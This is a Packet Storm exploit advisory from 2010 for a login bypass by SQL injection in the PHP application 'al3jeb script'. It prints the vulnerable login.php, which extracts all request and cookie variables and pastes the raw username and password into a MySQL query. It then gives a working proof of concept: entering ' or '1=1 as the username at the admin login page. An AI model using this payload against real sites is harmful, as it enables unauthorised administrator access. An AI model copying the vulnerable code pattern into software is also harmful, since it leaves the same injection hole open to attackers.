Al3jeb Script SQL Injection

2010-01-20T00:00:00
ID PACKETSTORM:85403
Type packetstorm
Reporter cr4wl3r
Modified 2010-01-20T00:00:00

Description

                                        
                                            ` \#'#/  
(-.-)  
--------------------oOO---(_)---OOo-------------------  
| al3jeb script Remote Login Bypass Exploit |  
| (works only with magic_quotes_gpc = off) |  
------------------------------------------------------  
  
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>  
[!] Download: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300  
[!] Date: 19.01.2010  
[!] Remote: yes  
  
[!] Vulnerability Code [login.php] :  
  
<?  
session_start();  
extract($_POST);   
extract($_GET);   
extract($_SESSION);   
extract($_COOKIE);  
?>  
<?php  
include("Connections/config.php");  
if(isset($_POST['Submit']))  
{  
$u=$_POST["uname"];  
$p=$_POST["pwd"];  
$r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");  
  
if($row=mysql_fetch_array($r))  
{  
$_SESSION['AdminName']=$u;  
if(isset($re))  
{  
setcookie("username",$u,time()+3600);  
}  
header("location:index.php");  
  
}  
}  
?>  
  
  
[!] PoC: [al3jebscript]/login.php  
  
username : ' or '1=1  
password : cr4wl3r  
`